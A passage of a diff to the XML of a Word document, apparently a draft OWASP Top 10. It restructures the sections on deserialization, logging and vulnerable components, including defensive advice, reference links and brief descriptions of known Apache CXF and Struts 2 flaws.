-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Cheat Sheet - TBA</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId105">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Dependency Check (for Java and .NET libraries)</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId112">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Virtual Patching Best Practices</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">External</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId113">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">The Unfortunate Reality of Insecure Libraries</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId114">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">MITRE Common Vulnerabilities and Exposures (CVE) search</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId107">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId106">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">Retire.js for detecting known vulnerable JavaScript libraries</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId115">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">Node Libraries Security Advisories</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1033"/>
+          <w:numId w:val="1037"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -6101,18 +5655,113 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">Ruby Libraries Security Advisory Database and Tools</w:t>
+          <w:t xml:space="preserve">OWASP Proactive Controls - Implement Logging and Intrusion Detection</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1037"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Application Security Verification Standard - V7 Logging and Monitoring</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1037"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Testing Guide - Testing for Error Code</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1037"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId117">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Cheat Sheet - Logging</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="118" w:name="external-7"/>
+      <w:bookmarkEnd w:id="118"/>
+      <w:r>
+        <w:t xml:space="preserve">External</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1038"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId119">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">CWE-223: Omission of Security-relevant Information</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1038"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId120">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">CWE-778: Insufficient Logging</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="117" w:name="axx-deserialization-of-untrusted-data"/>
-      <w:bookmarkEnd w:id="117"/>
-      <w:r>
-        <w:t xml:space="preserve">AXX Deserialization of untrusted data</w:t>
+      <w:bookmarkStart w:id="121" w:name="a9-using-compenents-with-known-vulnerabilities"/>
+      <w:bookmarkEnd w:id="121"/>
+      <w:r>
+        <w:t xml:space="preserve">A9 Using Compenents with Known Vulnerabilities</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6353,14 +6002,21 @@
             </w:r>
           </w:p>
         </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="118" w:name="am-i-vulnerable-to-attack-7"/>
-      <w:bookmarkEnd w:id="118"/>
+      <w:bookmarkStart w:id="122" w:name="am-i-vulnerable-to-attack-8"/>
+      <w:bookmarkEnd w:id="122"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -6370,7 +6026,38 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Application architecture has changed dramatically over the last few years, with the move to "server-less" API driven mobile and single page applications, with the associated rise of functional programming frameworks and languages. This seismic shift in application architecture were accompanied by the idea of the client maintaining state, to allow theoretical simpler and more scalable functional code. However, the hallmark of application security is the location of trusted state. Security state cannot be sent to the client without some form of integrity promise.</w:t>
+        <w:t xml:space="preserve">The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId38">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">CVE</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId38">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">NVD</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6378,133 +6065,159 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Applications and APIs will be vulnerable if the code:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The client can create, replay, tamper, or chain existing serialized state (gadgets), AND</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The server or API deserializes hostile objects supplied by an attacker, AND</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The objects contain a constructor, destructor, callbacks, auto-instantiation (such as rehydration calls) OR</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1034"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The objects override protected or private member fields that contain sensitive state, such as role or similar</w:t>
+        <w:t xml:space="preserve">Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="119" w:name="how-do-i-prevent-8"/>
-      <w:bookmarkEnd w:id="119"/>
+      <w:bookmarkStart w:id="123" w:name="how-do-i-prevent-8"/>
+      <w:bookmarkEnd w:id="123"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1035"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The only safe architectural pattern is to not send or accept serialized objects from untrusted sources</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">If this not possible</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Implement integrity checks or encryption of the serialized objects to prevent hostile creation, tampering, replay and gadget calls</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Isolate code that deserializes, such that it runs in very low privilege environments, such as temporary containers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Enforce type constraints over serialized objects; typically code is expecting a particular class</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1036"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
+        <w:t xml:space="preserve">Most component projects do not create vulnerability patches for old versions. So the only way to fix the problem is to upgrade to the next version, which can require other code changes. Software projects should have a process in place to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId124">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">versions</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId125">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">DependencyCheck</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId126">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">retire.js</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve">, etc.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Continuously monitor sources like</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId127">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">for vulnerabilities in your components. Use software composition analysis tools to automate the process.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Analyze libraries to be sure they are actually invoked at runtime before making changes, as the majority of components are never loaded or invoked.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1039"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Decide whether to upgrade component (and rewrite application to match if needed) or deploy a</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId128">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">virtual patch</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">that analyzes HTTP traffic, data flow, or code execution and prevents vulnerabilities from being exploited.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="129" w:name="example-scenarios-7"/>
+      <w:bookmarkEnd w:id="129"/>
+      <w:r>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6512,69 +6225,51 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Larger and high performing organizations should also consider:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1037"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Rate limit API or methods that deserialize</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1037"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Restrict or monitor incoming and outgoing network connectivity from containers or servers that deserialize</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1037"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Monitor deserialization, alerting if a user deserializes constantly.</w:t>
+        <w:t xml:space="preserve">Components almost always run with the full privilege of the application, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g., coding error) or intentional (e.g., backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Struts 2 Remote Code Execution – Sending an attack in the Content-Type header causes the content of that header to be evaluated as an OGNL expression, which enables execution of arbitrary code on the server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1040"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Applications using a vulnerable version of either component are susceptible to attack as both components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="120" w:name="example-scenarios-7"/>
-      <w:bookmarkEnd w:id="120"/>
-      <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="121" w:name="references-8"/>
-      <w:bookmarkEnd w:id="121"/>
+      <w:bookmarkStart w:id="130" w:name="references-8"/>
+      <w:bookmarkEnd w:id="130"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -6583,8 +6278,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="122" w:name="owasp-7"/>
-      <w:bookmarkEnd w:id="122"/>
+      <w:bookmarkStart w:id="131" w:name="owasp-8"/>
+      <w:bookmarkEnd w:id="131"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -6593,7 +6288,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1038"/>
+          <w:numId w:val="1041"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -6610,7 +6305,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1038"/>
+          <w:numId w:val="1041"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -6627,7 +6322,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1038"/>
+          <w:numId w:val="1041"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -6644,7 +6339,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1038"/>
+          <w:numId w:val="1041"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -6659,30 +6354,156 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="123" w:name="external-6"/>
-      <w:bookmarkEnd w:id="123"/>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1041"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId125">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Dependency Check (for Java and .NET libraries)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1041"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId132">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">OWASP Virtual Patching Best Practices</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">CWE-502: Deserialization of Untrusted Data (#3)</w:t>
-      </w:r>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1042"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId133">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">The Unfortunate Reality of Insecure Libraries</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1042"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId134">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">MITRE Common Vulnerabilities and Exposures (CVE) search</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1042"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId127">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1042"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId126">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Retire.js for detecting known vulnerable JavaScript libraries</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1042"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId135">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Node Libraries Security Advisories</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1042"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId136">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Ruby Libraries Security Advisory Database and Tools</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="124" w:name="axx-insufficient-logging-and-monitoring"/>
-      <w:bookmarkEnd w:id="124"/>
-      <w:r>
-        <w:t xml:space="preserve">AXX Insufficient logging and monitoring</w:t>
+      <w:bookmarkStart w:id="137" w:name="a10-tba"/>
+      <w:bookmarkEnd w:id="137"/>
+      <w:r>
+        <w:t xml:space="preserve">A10 TBA</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -6923,14 +6744,21 @@
             </w:r>
           </w:p>
         </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+          </w:p>
+        </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="125" w:name="am-i-vulnerable-to-attack-8"/>
-      <w:bookmarkEnd w:id="125"/>
+      <w:bookmarkStart w:id="138" w:name="am-i-vulnerable-to-attack-9"/>
+      <w:bookmarkEnd w:id="138"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -6947,8 +6775,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="126" w:name="how-do-i-prevent-9"/>
-      <w:bookmarkEnd w:id="126"/>
+      <w:bookmarkStart w:id="139" w:name="how-do-i-prevent-9"/>
+      <w:bookmarkEnd w:id="139"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -6965,8 +6793,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
